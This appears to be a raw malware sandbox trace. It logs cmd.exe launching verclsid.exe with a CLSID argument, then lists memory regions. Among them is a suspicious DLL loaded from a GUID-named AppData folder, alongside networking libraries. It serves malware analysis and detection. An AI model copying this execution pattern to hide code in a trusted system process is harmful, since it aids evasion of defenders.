[0550.087] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4
[0550.087] _wcsicmp (_String1="REM", _String2="Exit") returned 13
[0550.087] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13
[0550.087] GetProcessHeap () returned 0x3c0000
[0550.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3da060
[0550.087] GetProcessHeap () returned 0x3c0000
[0550.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1a) returned 0x3d4770
[0550.089] GetConsoleTitleW (in: lpConsoleTitle=0x20f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0550.090] _wcsicmp (_String1="start", _String2="DIR") returned 15
[0550.090] _wcsicmp (_String1="start", _String2="ERASE") returned 14
[0550.090] _wcsicmp (_String1="start", _String2="DEL") returned 15
[0550.090] _wcsicmp (_String1="start", _String2="TYPE") returned -1
[0550.090] _wcsicmp (_String1="start", _String2="COPY") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="CD") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="CHDIR") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="RENAME") returned 1
[0550.090] _wcsicmp (_String1="start", _String2="REN") returned 1
[0550.090] _wcsicmp (_String1="start", _String2="ECHO") returned 14
[0550.090] _wcsicmp (_String1="start", _String2="SET") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="PAUSE") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="DATE") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="TIME") returned -1
[0550.091] _wcsicmp (_String1="start", _String2="PROMPT") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="MD") returned 6
[0550.091] _wcsicmp (_String1="start", _String2="MKDIR") returned 6
[0550.091] _wcsicmp (_String1="start", _String2="RD") returned 1
[0550.091] _wcsicmp (_String1="start", _String2="RMDIR") returned 1
[0550.091] _wcsicmp (_String1="start", _String2="PATH") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="GOTO") returned 12
[0550.091] _wcsicmp (_String1="start", _String2="SHIFT") returned 12
[0550.091] _wcsicmp (_String1="start", _String2="CLS") returned 16
[0550.091] _wcsicmp (_String1="start", _String2="CALL") returned 16
[0550.091] _wcsicmp (_String1="start", _String2="VERIFY") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="VER") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="VOL") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="EXIT") returned 14
[0550.091] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14
[0550.091] _wcsicmp (_String1="start", _String2="TITLE") returned -1
[0550.092] _wcsicmp (_String1="start", _String2="START") returned 0
[0550.092] GetProcessHeap () returned 0x3c0000
[0550.092] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x118) returned 0x3da120
[0550.104] GetProcessHeap () returned 0x3c0000
[0550.104] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3da120, Size=0x98) returned 0x3da120
[0550.105] GetProcessHeap () returned 0x3c0000
[0550.105] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3da120) returned 0x98
[0550.107] GetProcessHeap () returned 0x3c0000
[0550.107] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa0) returned 0x3da1d0
[0550.109] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0550.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0550.109] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DIR") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="ERASE") returned 17
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DEL") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="TYPE") returned 2
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="COPY") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="CD") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="CHDIR") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="RENAME") returned 4
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="REN") returned 4
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="ECHO") returned 17
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="SET") returned 3
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="PAUSE") returned 6
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DATE") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="TIME") returned 2
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="PROMPT") returned 6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="MD") returned 9
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="MKDIR") returned 9
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="RD") returned 4
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="RMDIR") returned 4
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="PATH") returned 6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="GOTO") returned 15
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="SHIFT") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="CLS") returned 19
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="CALL") returned 19
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VERIFY") returned -6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VER") returned 99
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VOL") returned -10
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="EXIT") returned 17
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="SETLOCAL") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="ENDLOCAL") returned 17
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="TITLE") returned 2
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="START") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="DPATH") returned 18
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="KEYS") returned 11
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="MOVE") returned 9
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="PUSHD") returned 6
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="POPD") returned 6
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="ASSOC") returned 21
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="FTYPE") returned 16
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="BREAK") returned 20
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="COLOR") returned 19
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="MKLINK") returned 9
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="FOR") returned 16
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="IF") returned 13
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="REM") returned 4
[0550.114] _wcsnicmp (_String1="verc", _String2="cmd ", _MaxCount=0x4) returned 19
[0550.115] GetProcessHeap () returned 0x3c0000
[0550.115] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x420) returned 0x3c1320
[0550.115] SetErrorMode (uMode=0x0) returned 0x0
[0550.115] SetErrorMode (uMode=0x1) returned 0x0
[0550.115] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c1330, lpFilePart=0x1f2820 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1f2820*="system32") returned 0x13
[0550.116] SetErrorMode (uMode=0x0) returned 0x1
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1320, Size=0x52) returned 0x3c1320
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1320) returned 0x52
[0550.116] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0550.116] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1ce) returned 0x3c1390
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x38c) returned 0x3c1570
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1570, Size=0x1d0) returned 0x3c1570
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1570) returned 0x1d0
[0550.119] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe8) returned 0x3da280
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.120] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3da280, Size=0x7e) returned 0x3da280
[0550.120] GetProcessHeap () returned 0x3c0000
[0550.120] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3da280) returned 0x7e
[0550.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0550.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe"), fInfoLevelId=0x1, lpFindFileData=0x1f2590, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2590) returned 0x3d8600
[0550.120] GetProcessHeap () returned 0x3c0000
[0550.120] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x28) returned 0x3d47a0
[0550.120] FindClose (in: hFindFile=0x3d8600 | out: hFindFile=0x3d8600) returned 1
[0550.121] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0550.121] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0550.121] GetStartupInfoW (in: lpStartupInfo=0x1f2c60 | out: lpStartupInfo=0x1f2c60*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0550.121] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2b38 | out: lpAttributeList=0x0, lpSize=0x1f2b38) returned 0
[0550.121] GetLastError () returned 0x7a
[0550.121] GetProcessHeap () returned 0x3c0000
[0550.121] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x48) returned 0x3d8600
[0550.121] InitializeProcThreadAttributeList (in: lpAttributeList=0x3d8600, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2b38 | out: lpAttributeList=0x3d8600, lpSize=0x1f2b38) returned 1
[0550.121] UpdateProcThreadAttribute (in: lpAttributeList=0x3d8600, dwFlags=0x0, Attribute=0x60001, lpValue=0x1f2b30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3d8600, lpPreviousValue=0x0) returned 1
[0550.121] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\verclsid.exe", lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1f2b70*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x1f2b58 | out: lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessInformation=0x1f2b58*(hProcess=0x58, hThread=0x54, dwProcessId=0x598, dwThreadId=0x564)) returned 1
[0550.129] DeleteProcThreadAttributeList (in: lpAttributeList=0x3d8600 | out: lpAttributeList=0x3d8600)
[0550.129] GetProcessHeap () returned 0x3c0000
[0550.130] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d8600 | out: hHeap=0x3c0000) returned 1
[0550.130] GetLastError () returned 0x7a
[0550.130] ResumeThread (hThread=0x54) returned 0x0
[0550.130] CloseHandle (hObject=0x54) returned 1
[0550.130] CloseHandle (hObject=0x58) returned 1
[0550.130] GetConsoleTitleW (in: lpConsoleTitle=0x20f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0550.131] exit (_Code=0)
Process:
id = "30"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x6798c000"
os_pid = "0x598"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "29"
os_parent_pid = "0x5a8"
cmd_line = "verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4609
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4610
start_va = 0xf0000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 4611
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4612
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4613
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4614
start_va = 0xff290000
end_va = 0xff296fff
monitored = 0
entry_point = 0xff291b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 4615
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4616
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4617
start_va = 0x7fffffd7000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4618
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4619
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4620
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4621
start_va = 0x170000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 4622
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4623
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4624
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4625
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4626
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4627
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4628
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4629
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4630
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4631
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4632
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4633
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4634
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4635
start_va = 0x170000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 4636
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 4637
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4638
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 4639
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4640
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4641
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4642
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4643
start_va = 0x5e0000
end_va = 0x760fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 4644
start_va = 0x770000
end_va = 0x1b6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 4645
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4646
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4647
start_va = 0x2b0000
end_va = 0x32cfff
monitored = 0
entry_point = 0x2bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4648
start_va = 0x2b0000
end_va = 0x32cfff
monitored = 0
entry_point = 0x2bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4649
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4650
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4651
start_va = 0x1b70000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b70000"
filename = ""
Region:
id = 4652
start_va = 0x1b70000
end_va = 0x1c4efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b70000"
filename = ""
Region:
id = 4653
start_va = 0x1c60000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c60000"
filename = ""
Region:
id = 4654
start_va = 0x7fefa530000
end_va = 0x7fefa586fff
monitored = 0
entry_point = 0x7fefa531118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 4655
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 4656
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4657
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4658
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4659
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4660
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4661
start_va = 0x2b0000
end_va = 0x2f2fff
monitored = 1
entry_point = 0x2d8ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 4662
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 4663
start_va = 0x7fef7310000
end_va = 0x7fef7318fff
monitored = 0
entry_point = 0x7fef7311070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 4664
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4665
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4666
start_va = 0x1ce0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 4667
start_va = 0x1d70000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 4668
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4669
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4670
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4671
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4672
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4673
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4674
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4675
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
